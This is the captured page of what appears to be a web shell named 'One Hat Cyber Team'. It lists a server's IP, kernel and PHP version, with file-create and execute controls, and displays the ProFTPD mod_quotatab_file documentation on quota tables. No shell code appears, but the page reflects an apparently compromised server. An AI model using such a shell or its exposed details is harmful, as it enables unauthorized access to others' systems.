⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
proftpd-doc
/
contrib
/
View File Name :
mod_quotatab_file.html
<!DOCTYPE html> <html> <head> <title>ProFTPD module mod_quotatab_file</title> </head> <body bgcolor=white> <hr> <center> <h2><b>ProFTPD module <code>mod_quotatab_file</code></b></h2> </center> <hr><br> This <code>mod_quotatab</code> submodule is contained in the <code>mod_quotatab_file.c</code>, and is found in the <code>contrib/</code> area of the ProFTPD source distribution. See the <code>mod_quotatab</code> <a href="mod_quotatab.html#Installation">installation</a> instructions. <p> This submodule provides the file-specific "driver" for storing quota table information in files. <h2>Author</h2> <p> Please contact TJ Saunders <tj <i>at</i> castaglia.org> with any questions, concerns, or suggestions regarding this module. <p> <hr><h2><a name="FileTables">File Quota Tables</a></h2> Using file-based quota tables (<em>source-type</em> of "file") the data will be stored in binary fixed-record format. This module is accompanied by a tool, <a href="ftpquota.html"><code>ftpquota</code></a>, to help in creating and managing these file-based tables. <p> The <code>mod_quotatab_file</code> module supports the "file" string for the <em>source-type</em> parameter of the <a href="mod_quotatab.html#QuotaLimitTable"><code>QuotaLimitTable</code></a> and <a href="mod_quotatab.html#QuotaTallyTable"><code>QuotaTallyTable</code></a> configuration directives. If the "file" <em>source-type</em> is used, then the <em>source-info</em> parameter must be the full path to the file table. <p> <code>mod_quotatab_file</code> treats any number <b>zero or less</b> for a <b>bytes limit</b> as "unlimited". Similarly, it treats a value of <b>zero</b> for any of the <b>files limit</b>s as "unlimited". "Unlimited" values are ignored, in that any limit that is "unlimited" is not used in any of <code>mod_quotatab</code>'s calculations. <p> Examples: <pre> # Using a file-based limit table QuotaLimitTable file:/usr/local/proftpd/ftpquota.limittab # Using a file-based tally table QuotaTallyTable file:/usr/local/proftpd/ftpquota.tallytab </pre> <p> <hr> <font size=2><b><i> © Copyright 2000-2013 TJ Saunders<br> All Rights Reserved<br> </i></b></font> <hr> </body> </html>